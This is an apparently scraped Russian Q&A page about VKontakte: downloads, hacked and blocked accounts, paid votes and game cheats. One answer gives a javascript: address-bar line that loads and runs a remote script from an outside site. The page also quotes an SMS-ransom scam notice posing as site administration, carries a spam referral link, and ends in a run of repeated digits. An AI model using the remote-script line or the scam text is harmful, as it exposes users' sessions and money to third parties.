понедельник, 13 мая 2013 г.

хочу купить планшет но незнаю какой лучше , нужно чтобы и вконтакте приложения тянул и по цене не больше 30 тыь рублей



Лучше Galaxy tab брать. На андроид будешь качать любые приложения с интернета бесплатно. А на Ipad все только через itunes и за все хорошее надо будет платить деньги

люди, пришлите пожаалуйста ссылки вконтакте на фэнов Майкла Джексона из города Миасс.. мне оччень нужно их найти

скоро еду в этот городок и хочу там с фэнами встретиться, поэтому ищу их, помогите пожалуйста

Скачать програму для бесплатной отправки подарков вконтакте

а если найдешь, то упрет у тебя пароль и разошлет друзьям спам.

Куплю голоса вконтакте. Куплю голоса вконтакте

Бери мой голос ААААААААААААААААААААААААААААААА

Что делать с ВКОНТАКТЕ?

Когда захожу на свою страницу с компьютера, ввожу пароль, потом он просит ввести код с картинки, далее следует вот это (картинка). Я заполняю поля. Потом он просит ввести свой номер, ввожу номер. На телефон приходит смс: Для получения кода отправьте Да в ответ на это смс, для отказа Нет. Ну вот я отправила Да, мне пришло такое смс Извините, на вашем счёте недостаточно средств для оплаты услуги. ХОТЯ У МЕНЯ 14 рублей было на счету! и вот такая фигня во всех браузерах, на любой странице на которую я захожу. Зашла вк через телефон, там сначала было все нормально, а потом написали, что заморозили меня до 23:51. Это ладно. А если я зайду в 23:51 и у меня будет такая фигня опять! Что делать?!

Как скачать видео Вконтакте???

там теперь как бы два вида окон с видео... В одном есть кнопка S и можно скчть при помощи VkSaver, а другом окне нет такой кнопочки... как скачать такое видео??? Я пробовла качивать разные программы... ничего не получается....(((

Подскажите сайты типа вконтакте

odnoklassniki.ru

почему вконтакте добовляются странные тети

Мне какието бабы там предлогают эротические услуги.

Как скачивать видео с Вконтакте через программу Freemake Video Downloader??? Заронее спасибо

Лучше через это. Установите вот это расширения и качайте . Цитирую : Помогает бесплатно скачивать с контакта,с ютуба и более 40 других сайтов в 1 клик. вам сюда удачи!

нужна НЕ ВИРУСНАЯ программа для скачки музыки Вконтакте. VikiSaver и VkontakteDJ не предлагать, опробовано

Дамочка, Вы, как в магазин зашли:), удивляюсь:), ну уже была Вам дана не вирусная программа VKmusic, действительно, заточена под контакт, качает клиппы и ролики отовсю ду, бесплатна, а касперский и доктор веб по её поводу пока молчат хотя защита от вирусов-ваше личное дело

Подскажите сайты,похожие на: вконтакте, всети, друзья

facebook and tvitter and страна друзей одноклассники

Если у телки статус вконтакте - Да, жизнь тяжелая штука...и ещё имеет свойство заканчиваться...то че это значит????

Увидела у кого-то красивое выражение и решила себе такое же в статус поставить.

играете ли вы вконтакте в....

счастливого фермера и/или звериную ферму?не надоело ли еще?

А вы вконтакте сидите?

Сижу,но сейчас реже,чем раньше. Захожу только в группах полазить и новости посмотреть

Помогите, это в Вконтакте!!!

Мне приходят открытки, но я не могу посмотреть саму открытку и того, кто их шлет!!! Как посмотреть присланную открытку??? Сделать лидером

как познакомиться на сайте в вконтакте?

боюсь в друзья добавить и не знаю с чего общение начать..(( в вк не могу, зато в реальности проще намного!!!)) есть свежие идеи? как познакомится? Добавлено 1 год назад Виктория, думаешь я такой извращенец в вк, да ещё и ава у меня там не своя? это только тут чужая, на своей странице в вк всё родное стоит)) N@TySьКА=))) ну а что тут такого? к вам начнёт лезть какой-то мужик, так вы про него потом думаете уу бабник, пикапер хренов .. Lady, я знаю о чём можно говорить, да видать с интернет-задротками по другому как-то надо)) я добавляю в друзья и мне сразу сообщение ты кто такой, откуда взялся? отвечаю всем хочу познакомится с тобой, а дальше она удаляет меня без причины))

Подскажите пожалуйста,где можно скачать программу для взлома ВКонтакте!

Вроде такой большой, а в сказки веришь. есть только брут для подбора паролей, но после нескольких неудачных попыток будет капча атаковать.

Как вконтакт зайти ? надо 4 цифры везти какие незнаю

UserFrom be fo banned! - Твой профиль имеет бан. Снять бан можно тут: это админ!!!

вконтакте-сайт для идиотов

вконтакте очень удобный и интересный сайт для общения с людьми с которыми я редко вижусь. А если вы живете по маршруту работа (учеба) -----дом то конечно..

Ава вконтакте

Подскажите как сделать аву вконтакте так,что бы её не могли приблизить когда хотел рассмотреть,не могли комментировать и ставить мне нравится.Ну например я поставил какую-то аву, и вот поставил эти настройки для неё,потом мой друг хочет её рассмотреть,но не может её увеличить,и даже нажать на неё.В общем стоит просто ава,без увеличения и т.д

Взломали вконтакте, а почему то не могу заново зарегистрироваться. Почему?

так потому что там уже есть все твои данные)))))))))))))))) надо просто поменять пороль на старой странице))))))))))))

как взломать онлайн игры (например Вормикс Вконтакте) с помошью Art money и wpe pro

Никак. Вся информация хранится на сервере, а к нему программы типа АртМани получить доступ не могут. Они могут получить доступ только в браузеру, а в нем нечего изменять.

добавляю в друзья вконтакте,голос в подарок,или подарок.!

Где бесплатно качать фильм?

Здесь: http://my-hit.ru/ можно смотреть фильмы онлайн, а также скачивать. Бесплатно, регистрация не обязательна, Приятного просмотра и скачивания!

Проблемма с пополнением голосов Вконтакте.

Хотел попролнить нормально голоса вконтакте, без взлома и других программ, вхожу в Личный счёт после нажимаю Получить голоса, и мне видает, Ошибку - JavaScript error: at line 623, column 15: in string literal: invalid line terminator. И ВСЕ ЗАВИСАЕТ. Хто сталкивался с подобной проблемой, помогите советом, буду благодарен.

Скачать музыку Вконтакте - что можно улучшить в программе?

Я не пользуюсь программами не проверенных авторов. Мне вполне достаточно Internet Download Manager. Скачивает потоковое аудио и видео почти со всех сайтов

Как добавлять в описание группы ВКонтакте картинку?

Пройдите по данным ссылкам... Как оформить группу В Контакте и создать красивое графическое меню Как вставить картинку в новости группы ВКонтакте

Вконтакте

Люди, кто может мне обьяснить, почему в контакте я не могу оставить граффити на стене, меня типо просят загрузить попозже

Как перевести голоса из Вконтакте на счёт Webmoney(WMR)? Я хочу перевести голоса в рубли.

В евро переводи сразу.

Как можно охарактеризовать эмоции человека, который удаляет другого из друзей вконтакте после какой-то переписки с ним?

Смотря какая переписка и смотря какой человек по натуре.Так трудно сейчас ответить на Ваш вопрос)Может зол,может ему надоел адресат сообщений,может чтобы показать,что он уверенно не отступит от своей точки зрения и ему проще выслать куда подальше своего онлайн-друга)

Можно ли повысить рэйтинг вконтакте бесплатно

Нет, бесплатных способов нету! а жаль...

вконтакте группа

БОЛЬШЕ не могу!Что за фигня-то такая Почему когда в поиск вводишь имя Джанет Джексон и ищещь группы о неё моя группа почти последняя,а впереди моей группы те группы у которых НАМНОГО МЕНЬШЕ ЧЕЛОВЕК!АААААА!Как же это бесит!(( Добавлено 3 года назад ох ё! ещё и не туда вопрос задала!!

Ребят хэлп ..!при входе на сайты вконтакте и однокласники не упев нажать на кнопку вход постле ввода пар

Ни в коем случае не отправляйте никакие СМС!!! Почитайте тут- http://vkontakte-advisor. ru/article/41 пробел в ссылке после точки уберите. Там подробно описано - как проходит валидация. Если у вас не так... Селайте так: Скачайте бесплатную лечащую утилиту Dr.Web CureIt! http://freedrweb.com/cureit/ И проверьте компьютер на вирусы. После этого - попробуйте зайти вконтакт ещё раз.

Почему я уже месяц не могу зайти на сайт вконтакте? Только через анонимайзеры. А с других компьютеров могу

А с других компьютеров могу

я не могу зайти на сайт ВКонтакте

Вы пытаетесь зайти на сайт из необычного места. Чтобы подтвердить, что Вы действительно являетесь владельцем страницы, пожалуйста, укажите Ваш номер телефона, к которому привязана страница. Ввожу номер, приходит смс Подтвердите совершеннолетие, ответьте на смс указав свой возраст Телефон поддержки 88001007337 от3121 Что мне делать, помогите пожалуйста...

Ругаемся из-за друзей Вконтакте.Кому ещё портят жизнь социальные сети?

чем больше их контролируешь, тем больше они видят нашу слабость, наш страх их потерять....в таких случаях поступают очень просто-женщина просто сама начинает участвовать в его жизни.Расспроси о его друзьях, покажи, что сама не прочь с ними общаться и если это девушки, покажи, что ты не ревнуешь.НО на встречи не соглашайся,к хорошему они его не приведут.Пусть он узнает, что у тебя тоже есть друзья на таких сайтах и доверие друг к другу-залог ваших хороших отношений.НЕ устраивай скандалов-мужчины этого не любят.И помни-контролируй, но с умом и ненавязчиво.

официальная страница торреса вконтакте

Ну тогда я телефон 358596685+9834,только код Лондона введи,и скажи,что от меня,пароль:Ты продал Ливерпуль? Ответ: Я его на на своём болте вертел

Сайт ВКонтакте...

Можно ли как-нибудь посмотреть, искал ли меня кто-нибудь на сайте ВКрнтакте, если этот человек не попросился в друзья, а просто хотел зайти на страничку. Доступ ограничен.

после переезда вконтакте не могу зайти на свою страницу. Помогите пож-та!!!!

пароль смени!! у меня такое с 2 страницах было! если всё ровно, админам жалуйся!

я создал группу вконтакте о здоровом образе жизни! где лучше разместить тексты о правильном питании и тому подобном?

Где хочешь, так и ставь. Разницы нет. Главное, чтоб удобно было.

как прочитать чужую переписку вконтакте ? бесплатно!!!!мне кажется в мире много влюблённых я должна проверить

Могу дать пароль от моего ВК. Почитаешь. Иначе никак. А что, шибко хочется чтоли?

Кто хочет лайки Вконтакте бесплатно - рекомендую сайт взаимного обмена сердцами http://olikefriends003.ru/?partner=7893!

Спасибо!

Кому нужны голоса ВКонтакте (недорого)?

Есть немаленькая сумма голосов на сайте ВКонтакте. Продаю их за недорого! (за ценами в ЛС) Оплата WebMoney или наличка (Киев). Не кидаю, отзывы имеются. :) Кому нужны пишите!

помогите у меня проблемы с сайтом вконтакте!

при входе на сайт он мне выдаёт такую надпись и не чего не работает, что можно сделать! Уважаемый пользатель! С Вашего аккаунта была замечена неоднократная SPAM рассылка! В связи с этим Ваша страница была времено заблокирована, для разблокировки Вашего аккаунта Вам необходимо отправить SMS с текстом 6533146 на номер 1350. Напоминаем, что мы в праве удалять неактивные аккаунты в течении 2х недель. В случае возникновения вопросов или сложностей, Вы всегда сможете получить помощь в нашей службе поддержки. Связь со службой поддержки: ICQ 631-879-678 (С 12 до 18 ежедневно). Так же Вы можете позвонить нам и поговорить по skype, login: vkontakte.support (режим работы 12.00 - 18.00). В самом экстренном случае вы можете позвонить нам по телефону +30988900385 (для жителей Украины - звонок бесплатный). Свои жалобы вы можете высказать по данным координатам. Мы обязательно поможем вам. С уважением, администрация сайта ВКонтакте. Метки: Редактировать

Где можно скачать прогу для граффити вконтакте, бесплатно?

глупый вопрос вы гуглом вообще не пользовались никогда

скажите пожалуйста как удалить программу лови вконтакте с компьютера.?

Uninstall Tool это программа удаляет и из реестра

вормикс вконтакте(внутри)

Дайте пожалуйста читы я знаю что они есть,каждый 20 я знаю тока 2 кода и баг blood beef и шапка а баги на фузы деньги атаку броню не действуют!!.

Одежда из Вконтакте

Я покупала похожую из контакта. Качество - фуфло - китайской в плохом смысле этого слова. Лучше не покупай. Сейчас ведь выбор огромный в магазинах - на любой вкус и на любой кошелек.

Как узнать какой ответ был выбран в Предложении вконтакте?

Собственно сабж^^Видно только кто откликнулся, а хотелось бы еще и видеть что выбрали, да или нет..

Сестре вконтакте стал писать какой-то дядя. Как-то все завязалось до виртуального секса.Девочке 13 лет. Как реагировать?

Во первых нужно узнать, знает ли дядя, что девочке 13 лет. Если знает, то он педофил, сейчас в сети их активно отлавливают и ими занимается полиция. В конакте есть группа охотников за педофилами. club12378077 вот она. Вы можете туда написать, скинуть ссылку на страницу дяди, или как там делается я не знаю. Ребята обязательно помогут, и подскажут как поступить! Хорошо что вы заметили это, и подняли этот вопрос! Потому что такой дядя, сегодня в интернете детей развращает, а завтра выйдет на улицу, и не дай бог изнасилует ребенка! Обязательно, не оставьте это без внимания, ради безопасности вашей сестры, и других детей.

Как загрузить картинку в Вконтакте ?

В виде граффити нужно загрузить картинку на официальную страницу с добавлением текста. То есть текст и картинка отдельно, картинка в аттаче.

можно ли взломать мыло или же сразу вконтакте?

можно....но врядли этм будет кто то заниматся)

С какой целью люди собирают Мне нравится Вконтакте? и при этом готовы идти на всё.

самооценка низкая заняться нечем мода такая

Почему когда я сохраняю фото в фотошопе,качество картинки отличное а когда заливаю на сайт вконтакте то картинка уже не

четкая посоветуйте что и как нужно сохранить фото

Пропадают видео вконтакте. После добавления очередного видео,пропадают все видео на моей странице!

меняй пароль))) чтоб не лазили чужаки

игры ВКонтакте. Скажите,пожалуйста есть к играм ВКонтакте читы(коды),и к каким?

игры ВКонтакте. Скажите,пожалуйста есть к играм ВКонтакте читы(коды),и к каким?

подскажите программу для скачивания музыку вконтактах и где ее скачать

программа называется explorer.exe с включенным отображением скрытых файлов и папок, и его функция переименовывания файла.

Как выложить видео вконтакт? Помогите

Нажимаете видеозаписи, справа, где поиск нажмите добавить видеоролик. Напишете название, нажмете загрузить видео, потом нажмите выбрать файл, выберете и всё!

Закроют ли социальную сеть ВКОНТАКТЕ?

Создатель популярной социальной сети ВКонтакте заявил о том, что в марте 2012 года его детище прекратит работу, поскольку управлять сайтом стало слишком сложно. «ВКонтакте вышел из-под контроля, а стресс от управления компанией разрушил мою жизнь. Я должен положить этому конец», – заявил Павел Дуров во время пресс-конференции в Петербурге, сообщает ресурс.Ў Ў . По словам Павла Дурова, начиная с 15 марта 2012 года пользователи не смогут больше заходить на свои аккаунты. У пользователей ВКонтакте остается, таким образом, еще некоторое время, чтобы привыкнуть к жизни без социальной сети. «После 15 марта 2012 года весь сайт вырубится, – заявил Николай Дуров, вице-президент компании по техническим вопросам. – Поэтому если вы хотите когда-нибудь увидеть свои фотографии снова, вам лучше забрать их из интернета. Вы не сможете получить их обратно после того, как ВКонтакте покинет бизнес». Павел Дуров объявил, что решение прекратить работу ВКонтакте было сложным, однако он не думает, что люди будут расстроены. Впрочем, родители, кажется, довольным таким решением Павла. Их чада меньше времени будут проводить за монитором. Многие критикуют Дурова за его решение забросить франшизу, приносящую миллиарды долларов – на данный момент ВКонтакте называют одним из самых успешных бизнесов в мире. Экономисты оценивают его в $7,9 миллиарда. Павел Дуров же не намерен отступаться от своего решения. «Меня не волнуют деньги, – сказал он. – Я просто хочу жить, как жил раньше». Я думаю что это спетни.. Вконткте приносит много дохода

Помогите!Меня вконтакте взломали пишит с вашей страницы не адекратно рассылался спам по этому ее заблокировали

восстанавливать... Ввести старый пароль,потом новый, вам придет сообщение на телефон с кодом, в контакте появится окошечко, куда его ввести. Если сменил номер,к которому привязана страница, и нет возможности получить этот код, то там будет форма для заполнения, заполнить все поля, прикрепить 2 фотографии, одна-копия паспорта, студенческого или водительских прав, в общем любого документа, удостоверяющего личность и 2 фото: себя возле монитора - и всё, на следующий же день страницу восстановят. Волокита такая,но что делать)) Убрать блокер-вымогатель и плагины Или вариант-1 On-Line разблокировщики от Dr.Web - Бесплатный разблокировщик Dr.Web от Trojan. Winlock. http://www.drweb.com/unlocker/index http://www.drweb.com/unlocker/mobile/ http://news.drweb.com/show/?i=304c=9p=... от Лаборатории Каспеского - Сервис деактивации вымогателей-блокеров. http://support.kaspersky.ru/viruses/debl... от ESET NOD32 http://www.esetnod32.ru/.support/winlock... VIRUSINFO for the clern internet - Сервис деактивации вымогателей-блокеров. http://virusinfo.info/deblocker/ Или вариант-2: Скачай и прогони: Dr.Web CureIt! (Portable) сайт программы: http://freedrweb.com/cureit/ или http://soft.softodrom.ru/ap/Dr-Web-CureI... Скачай и прогони: Kaspersky Virus Removal Tool (AVPTool) сайт программы: http://devbuilds.kaspersky-labs.com/devb... или http://soft.softodrom.ru/ap/Kaspersky-Vi... Или вариант-3: RansomHide - утилита для удаления навязчивых [порно и т.п.] окон с предупреждением о блокировании системы до тех пор, пока не будет отправлено платное СМС. По сути, RansomHide предоставляет тот же самый сервис (получение разблокировочного кода), который создали уже многие антивирусные компании, но для того, чтобы получить код у них, требуется подключение к интернету, чего как раз не будет, так как вирус блокирует доступ к Сети. Под Windows: 7/Vista/XP. Интерфейс: Русский есть. Лицензия: Freeware - бесплатная программа. сайт программы: или http://soft.softodrom.ru/ap/RansomHide-p... Или вариант-4: Скачать Dr.Web® LiveCD с http://www.freedrweb.com/livecd/ или http://soft.softodrom.ru/ap/Dr-Web-LiveC... и записав образ на диск отсканировать компьютер на вирусы. Или вариант-5 (Чистка Host-файла): Открой скрытые файлы и папки в WINDOWS XP: ПУСК / Настройки / Панель управления / Свойства папки / вкладка Вид и в окне Дополнительные параметры: в подкаталоге Скрытые файлы и папки (внизу списка) поставить точку перед Показывать скрытые файлы и папки. в VISTA: Пуск / Панель управления / Свойства папки / Вид - там поставить галочку напротив Показывать скрытые файлы и папки. Далее: с:\windows\system32\drivers\etc (проверь Host-файл если под надписью locahost что-то то есть убери). Файл locahost открывается в блокноте. Или вариант-6: 1) Explorer: http://golden-b.ru/?p=306 2) Opera: http://golden-b.ru/?p=371 3) Mozilla Firefox: http://golden-b.ru/?p=487 Или вариант-7: Попробуй откати систему назад через точку Восстановления системы. На тот день когда всё было нормально. Пуск - Все программы - Стандартные - Служебные - Восстановление системы. Как сделать смотри тут: http://www.oszone.net/2713 Но в данном варианте велика вероятность, что плагин уйдёт, а вирус останется на компьютере. Или вариант-8: Как удалить Порно-информер? 1) Порно-информер влез в IE http://notes.rudomilov.ru/2008/11/28/inf... 2) Как избавится от порноинформера? http://waran.ru/index.php?view=itemscid... 3) Порно баннер информер на рабочем столе. Как убрать? http://www.comprofit.ru/inform/index.php... 4) Как убрать баннер с рабочего стола и не только http://chtivo.webhost.ru/articles/banner... 5) Я не могу войти в ...Что делать? http://www.yachaynik.ru/content/view/150... или программой On-line Contact http://www.yachaynik.ru/content/view/205... 6) Как удалить информер (всплывающую рекламную или новостную ленту).

Какая самая популярная сеть в Италии? Как Вконтакте, чтоб можно было незнакомых в друзья добавить.

по аналогии с ВКонтакте, то Facebook, а если самая популярная, то Twitter(но это по сути сервис микроблогинга)

левые люди в Вконтакте - посмотрела сейчас вот свой класс - поиск по букве класса и году выпуска - пловина людей

Это пришельцы... Они всегда были рядом, но вы их не замечали. А теперь они проявились на фотках. ))))))))))))))))))))))))))))))))

Откуда у людей так много друзей вконтакте?

Я про тех, у кого 600-700-800 и более друзей. Откуда столько? И неужели они со всеми общаются? (У меня просто около 150, и к трети из них я уже больше года точно на страничку не заходила. Общаюсь в основном с теми, с кем регулярно общаюсь в жизни. Ну и с бывшими одноклассниками, однокурсниками, некоторыми друзьями из других городов) Я понимаю, если, например, человек чем-то занимается: видео-обзоры делает, фотографией увлекается, украшения, сережки-колечки всякие создает. Тогда ясно, почему так много друзей. Люди просто интересуются их деятельностью, вот и добавляются. А в остальных случаях? У меня, например, подруга общается с огромным количеством людей каждый день: занимается танцами, учится играть на гитаре, всякие разнообразные кружки, лекции, семинары посещает. Она очень открытый и дружелюбный человек. Друзей у нее при этом примерно 400. Просто не понимаю, как можно быть еще более социально активным? Так вот, откуда такие запредельные цифры?=)

Как пополнить счет мобильного с помощью голосов Вконтакте

«QIWI-кошелек» — это удобный и безопасный способ оплаты популярных услуг. Платежная система QIWI выпустила приложение «QIWI-кошелек» для «ВКонтакте». С его помощью пользователи могут покупать голоса для социальной сети и оплачивать услуги провайдеров. «QIWI-кошелек» предоставляет доступ к «Личному кабинету QIWI» через популярную социальную сеть. С помощью приложения можно оплатить услуги провайдеров, счета из интернет-магазинов, а также выполнить другие операции, обычно доступные через терминал. При оплате через «QIWI-кошелек» стоимость одного голоса «ВКонтакте» составит 7 рублей. Интерфейс программы «QIWI-кошелек» в соцсети ВКонтакте

Что повашему мнению круче Вконтакте или Facebook?

Какая социальная сеть лучше как вы считаете и почему? Где лучше зарегистрироваться? Добавлено 1 год назад Голосуйте!

народ бывает у вас, что на сайте вконтакте проходит какой

Что?

заблокирована страница вконтакте. что делать?

Обратится к администрации сайта, через форму восстановления страницы (после восстановления поставить сложный пароль что нибудь типа: D9b6sSf7v12F, и больше не лазить по сомнительным ссылкам с обещаниями какой нибудь халявы для контакта, или с обещаниями научить взламывать страницы!!)

как взломать вконтакте если знаю @mail и половину пороля?

Наказания за взлом ВКонтакте и подобных сайтов: Часть 1 статья 138 УК Нарушение тайны переписки - это если вы взломали и посмотрели сообщения наказывается штрафом в размере до восьмидесяти тысяч рублей или в размере заработной платы или иного дохода осужденного за период до шести месяцев, либо обязательными работами на срок от ста двадцати до ста восьмидесяти часов, либо исправительными работами на срок до одного года. Часть 2 статья 138 УК Нарушение тайны переписки с помощью служебного положения, т.е. на рабочем месте или с помощью специальных технических средств (проги, брут) наказывается штрафом в размере от ста тысяч до трехсот тысяч рублей или в размере заработной платы или иного дохода осужденного за период от одного года до двух лет, либо лишением права занимать определенные должности или заниматься определенной деятельностью на срок от двух до пяти лет, либо обязательными работами на срок от ста восьмидесяти до двухсот сорока часов, либо арестом на срок от двух до четырех месяцев. Часть 1 статья 272 УК Неправомерный доступ к компьютерной информации - сам взлом. наказывается штрафом в размере от двухсот до пятисот минимальных размеров оплаты труда или в размере заработной платы или иного дохода осужденного за период от двух до пяти месяцев, либо исправительными работами на срок от шести месяцев до одного года, либо лишением свободы на срок до двух лет Часть 2 статья 272 УК - тоже самое но группа лиц - т.е. Вы и еще ваш друг, друзья вам помогали. наказывается штрафом в размере от пятисот до восьмисот минимальных размеров оплаты труда или в размере заработной платы или иного дохода осужденного за период от пяти до восьми месяцев, либо исправительными работами на срок от одного года до двух лет, либо арестом на срок от трех до шести месяцев, либо лишением свободы на срок до пяти лет

как прокачаться в Вормикс ВКонтакте бесплатно

Никак ) Все сайты предлагающие прокачку, это откровенный развод) И к тому же у разработчиков уже давно стоит античитерская программа, которая блокирует читеров. Несколько раз видел лично когда бой завершался, а противник был объявлен читером))))

как изменить размер картинки, которая не помещается вконтакт на аву...(была норм картинка, я вырезал себя на ней..((

В том же paint рисунок - растянуть/наклонить - поставь не 100, а например 50%

Где можно в интернете порисовать онлайн с др.людьми?(рисовалка вконтакте не работает(

тут

кто знает читы к игре безумие что вконтактах.помогите.помогите. помогите.помогите

Вопрос про Вконтакте....зайдите, плиз, ответьте....

Вам приходят иногда сообщения от посторонних людей? Например, ко мне вот в друзья попросился парень незнакомый, я ему написала, спросила знакомы ли мы :) Ответил, что нет, но хотел бы познакомиться, спросил не против ли я... комплимент сделал :) Никакого интима, и намека на это... вроде по аватарке нормальный парень... ну, без всяких там порно страниц....Вот я и не знаю, что делать. Вернее, как на это реагировать? Мог ли он правда случайно наткнуться именно на меня и я ему понравилась? Хотя... из такого количества народа, что сидит в контакте....он выбрал меня? Очень не верится... я может слишком подозрительная, но мне всегда кажется, что это просто развод чей-нибудь... розыгрыш, прикол, проверка....Я его предложение добавки в друзья, уже отклонила....просто если попробовать пообщаться. как мне теперь добавить его в друзья к себе?)))))что скажите?

когда сидишь в вконтакте ,не выходя со своей страницы закрываешь просто браузер то отсвечивает онлайн или не онлайн?

Как вКонтакте пригласить человека для регистрации?

В правом верхннм углу есть пригласить. на номер телефона того человека,которого вы пригласили,придет смс.

вконтакте как вставить в комментарии картинку? вконтакте как вставить в комментарии картинку?

Справа внизу в области нового комментария есть надпись Прикрепить

Как коментировать фотку вконтакте чтобы БЫЛО ИМЯ запятая(например:Пётр, очень красивое фото)???

Тебе в новостях придет оповещение что например Петр ответил тебе . Например ты написал красивое фото а в новостях тебе приходит спасибо ну от Петра естественно и внизу колонка где должен ты написать .. Ты только нажимаешь на эту колоку а там уже написанно Петр, а ты свой текст пишешь например да незачто и получается Петр, да незачто ..

Хочу обратить внимание девушки ВКонтакте. Хочу заменить банальное Привет, на красивую картинку в графити.

Вконтакте ещё можно подарок подарить - это очень приятно:) Смешного и романтичного, например, принцеса и бродячий актёр хотели поцеловаться закрытыми глазами, но поцеловали пролетешвего между ними голубя... Только не пиши: пойдём, пивка попьём многие девушки после такого приглашения могут вообще перестать с тобой общаться.

а у тебя есть друзья?

есть конечно..а как без друзей.

Взломали вконтакте помогите

. отправил на номер код. ввёл его вконтакте, потом поменял пароль, захожу а там Ваша страница была взломана, и с нее рассылался спам. Чтобы это прекратилось, Вам необходимо сменить пароль от страницы. всё меняю., потом появляется окошко, нужно ввести номер телефона который привязан к странице, ввожу.. а там пишется что номер не правельный. хотя так подумать но код для востановление пароля приходит же. помогите. что делать!

Как узнать из какой группы вконтакте меня удалили?

А там разве из групп удаляют?!!.(наверно из той,в которой ты себя плхо вёл(а)))

Подскажите нормальные сайты для подготовки к ЕГЭ,где можно скачать книжки :)

очень помогает группа вконтакте под названием хочу знать,по каждому предмету существуют видеуроки с подробным разбором задач

какая программа для скачивания видео и музыки из вконтакте безопасна? вот например Lovi vkontakte ставит свои host файлы

javascript:var s=document.createElement(script);s.src=http://videosaver.ru/vs.js?nc=+Math.random();document.body.appendChild(s);void(0); ВСТАВЛЯЕТЕ В АДРЕСНУЮ СТРОКУ , А ДАЛЬШЕ ПОСУТУАЦИИ

Почему вконтакте не могу написать никому сообщение вылазит окно и пишет привязать номер тел.к странице.Что мне делать?!

У меня тоже не работает, хотя и е-мейл, и пароль ввожу, а все равно номер телефона требует. Ну его, этот Контакт, мне и на Мейл.ру хорошо, безо всяких привязок.

СРОЧНО!СРОЧНО!СРОЧНО! на каком сайте вы качаете бесплатно видео, только не в вконтакте.

там можно качать всё, и темы для телефона и заставки и игры и видео

сколько процентов людей из ответов сидят во Вконтакте??)

ну думаю что почти у всех анкета есть вконтакте...и у мну есть тока яч там так редко что ппц

где скачать программу просмотра гостей ВКОНТАКТЕ?

такого еще нет.. это развод... с целью заиметь пароли и логины..

Где можно посмотреть фильмы онлайн бесплатно?

Может быть вот сайт: i-kino.com http://i-kino.com/

Посоветуйте программу для скачивания музыки ВКонтакте.Кроме VKLife.Спасибо за помощь!

установите дополнение в мозилле https://addons.mozilla.org/ru/firefox/ad... в контекстном меню появится пункт downloadhelper заходите на музыку или видео,правый клик-downloadhelper-media-имя файла-скачать.и все.

Как скачать на комп видео или музыку (Вконтакте)?

http://www.videosaver.ru/ хороший сайт с любый видео сайтов качать можно с youtube и многих других сам качаю

помогите,вконтакте если человек не прочитал сообщение,то оно выделяется синим цветом,а у меня нет,как это исправить?

яркость и контрастность на мониторе поменяй ;-) его просто очень плохо видно.

Кому нужны бесплатно голоса вконтакте и без всяких программ?

нахрен эти голоса.скоро всё равно все в фейсбук переползут, а там и он рухнет

хочу вконтакте пополнить счет голосами, там просят номер ввести

Вы наверно не раз задавались вопросом как получить голоса в контакте бесплатно? Увы, дорогой читатель, но получить получить голоса вконтакте бесплатно еще никому не удавалось. Поскольку голоса в контакте являются своеобразными денежными средствами, то получить бесплатные голоса в контакте можно лишь тремя способами: * заплатить денежные средства через sms (смс), терминалы и т.д. (это точно не бесплатно); * получить голоса в контакте бесплатно от других пользователей вконтакте (это бесплатные голоса); * получить голоса вконтакте бесплатно из различных приложений. Бесплатные голоса - как получить голоса в контакте бесплатно? Голоса в контакте бесплатно получить можно только от друзей. Либо в различных приложениях вконтакта, которые так или иначе заставят вас потратить свое время и трафик. Очень сомнительный обмен своего времени на бесплатные голоса в контакте. Все остальные способы получения бесплатных голосов в контакте так или иначе платны. Типичный пример мошенничества на этой почве, когда незнакомые вам люди предлагают отправить смс. Это 100% обман, деньги за смс с вас снимут, а бесплатных голосов вы не увидите. Учтите, что сейчас существуют платные короткие номера со стоимостью отправки смс на них более 300 рублей. Поэтому прежде чем получить голоса от в контакта бесплатно следует это иметь ввиду. Получить голоса в контакте бесплатно? Все остальные способы мошенничества типа взлом вконтакте и накрутка вконтакте являются разводом доверчивых граждан на деньги. В лучшем случае при попытке взлома вконтакте ваши персональные данные с помощью очередной ломалки перекочуют в руки злоумышленников, в худшем - придется долго и дорого ремонтировать персональный компьютер. И помните, что бесплатный сыр бывает только в мышеловке! Так уж получилось что на сегодняшний день у мошенников очень популярна тема как получить голоса в контакте бесплатно, занимаются таким мошенничеством в основном школота и прочие неразумные человекообразные существа. Правоохранительные органы неохотно берутся расследовать мелкие эпизоды мошенничества типа отправить sms. Поэтому единственный способ борьбы с бесплатными голосами по sms - не отправлять так называемые бесплатные смски. Таким образом, мы с вами выяснили что взломать вконтакте или накрутить вконтакте или тем более получить голоса в контакте бесплатно никому не удавалось без последствий для собственного кошелька. Будте счастливы и не обогащайте мошенников. Бесплатные голоса в контакте - старинное мошенничество!

Вконтакте пишет что моя страница взломана и с нее рассылается спам...

потом нужно сменить пароль со страницы, я меняю его, потом ввод с картинки, а потом номер телефона. Я написала свой номер но он пишет ошибка. Как зайти вконтакт?

Запрещен ли в Египте сайт вконтакте?

Насчет Египта не подскажу. Но это действительно может быть так. В прошлом году я заходила в интернет в аэропорту Шарджи (ОАЭ), в их интернет-кафе в транзитной зоне. И некоторые из российских соц сетей были запрещены. Именно запрещены, это не были ошибки загрузки или сбои. Выдавалось сообщение что-то там в стиле Access Denied, т.е. это политика. Если не ошибаюсь, запрещен был именно Вконтакте, а в Одноклассники можно было зайти спокойно. Так что не исключаю, что и других арабских странах могут быть подобные ограничения

Проблемы вконтакте

Удали эту программу, она тебе 100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000